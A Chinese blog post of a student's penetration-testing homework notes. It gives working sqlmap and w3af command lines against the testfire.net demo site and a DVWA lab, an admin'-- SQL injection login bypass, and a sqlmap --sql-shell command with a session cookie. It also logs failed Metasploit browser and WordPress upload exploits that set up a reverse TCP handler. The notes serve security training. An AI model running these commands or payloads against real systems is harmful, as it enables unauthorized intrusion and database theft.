标签:
p163 XSSF
默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads
将下载下来的zip文件解压,将其中的data, plugins, lab等文件夹合并到/usr/share/metasploit-framework/中的相应文件夹,然后即可在msfconsole中load xssf。
按照书上的做,但是最后的攻击并没有成功!
msf auxiliary(browser_autopwn) > xssf_exploit 8 15 [*] Searching Metasploit launched module with JobID = ‘15‘... [+] A running exploit exists: ‘Exploit: windows/browser/ie_createobject‘ [*] Exploit execution started, press [CTRL + C] to stop it ! [+] Remaining victims to attack: [[1] (1)] (停在这里一直不动) ^C[-] Exploit interrupted by the console user
p180 实践作业
1、探测www.testfire.net中存在的sql注入漏洞:
root@kali:~# w3af_console w3af>>> plugins w3af/plugins>>> audit sqli w3af/plugins>>> crawl web_spider w3af/plugins>>> back w3af>>> target w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx w3af/config:target>>> back The configuration has been saved. w3af>>> plugins w3af/plugins>>> output html_file w3af/plugins>>> output config html_file w3af/plugins/output/config:html_file>>> set verbose True w3af/plugins/output/config:html_file>>> back The configuration has been saved. w3af/plugins>>> back w3af>>> start
成功扫出 8 URLs and 10 different injections points.
用sqlmap去扫
sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"
检测出后台数据库的一些信息
在http://www.testfire.net/bank/login.aspx中通过构造 admin‘-- 的输入,轻松登入。
但是要怎么进一步的获得数据库中的信息呢?我还没搞定。
2、照书本p163做即可
3、wXf下载地址: https://github.com/forced-request/wXf
下载后解压,切换至解压目录下,运行./console,提示
/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:54:in `require‘: cannot load such file -- iconv (LoadError)
由于对ruby不太熟悉,网上的方法也看不太懂,暂且跳过。
4、我选择这个漏洞进行测试 https://www.exploit-db.com/exploits/37182/
然而得到的测试结果为:
[CRITICAL] all tested parameters appear to be not injectable.
不知道是不是后台服务器软件的版本问题。
5、不知道怎么弄。。先跳过
6、通过如下命令成功植入sql shell!
sqlmap -u ‘http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘ --cookie=‘security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2‘ --sql-shell
7、p177
按照提示一步一步来,但是没有成功:
[*] Started reverse TCP handler on 10.10.10.128:4444 [*] Successfully uploaded shell. [*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>413 Request Entity Too Large</title> </head><body> <h1>Request Entity Too Large</h1> The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br /> does not allow request data with POST requests, or the amount of data provided in the request exceeds the capacity limit. </body></html> ... [*] Exploit completed, but no session was created.
标签:
原文地址:http://www.cnblogs.com/justforfun12/p/5211907.html
